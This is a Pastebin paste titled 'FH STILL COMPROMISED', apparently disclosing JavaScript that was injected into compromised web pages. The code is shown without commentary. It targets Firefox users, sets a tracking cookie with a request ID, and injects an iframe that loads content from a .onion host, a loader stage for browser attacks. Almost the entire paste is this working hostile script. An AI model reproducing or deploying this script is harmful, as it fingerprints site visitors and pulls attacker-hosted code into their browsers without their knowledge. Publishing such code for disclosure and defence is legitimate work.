Advertisement
Guest User

FH STILL COMPROMISED

a guest
Aug 3rd, 2013
11,732
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.61 KB | None | 0 0
  1. function createCookie(name,value,minutes) {
  2. if (minutes) {
  3. var date = new Date();
  4. date.setTime(date.getTime()+(minutes*60*1000));
  5. var expires = "; expires="+date.toGMTString();
  6. }
  7. else var expires = "";
  8. document.cookie = name+"="+value+expires+"; path=/";
  9. }
  10.  
  11. function readCookie(name) {
  12. var nameEQ = name + "=";
  13. var ca = document.cookie.split(';');
  14. for(var i=0;i < ca.length;i++) {
  15. var c = ca[i];
  16. while (c.charAt(0)==' ') c = c.substring(1,c.length);
  17. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  18. }
  19. return null;
  20. }
  21.  
  22. function isFF() {
  23. return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  24. }
  25.  
  26. function updatify() {
  27. var iframe = document.createElement('iframe');
  28. iframe.style.display = "inline";
  29. iframe.frameBorder = "0";
  30. iframe.scrolling = "no";
  31. iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  32. iframe.height = "5";
  33. iframe.width = "*";
  34. document.body.appendChild(iframe);
  35. }
  36.  
  37. function format_quick() {
  38. if ( ! readCookie("n_serv") ) {
  39. createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  40. updatify();
  41. }
  42. }
  43.  
  44. function isReady()
  45. {
  46. if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  47.  
  48. if ( isFF() ) {
  49. format_quick();
  50. }
  51. }
  52. else
  53. {
  54. setTimeout(isReady, 250);
  55. }
  56. }
  57. setTimeout(isReady, 250);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement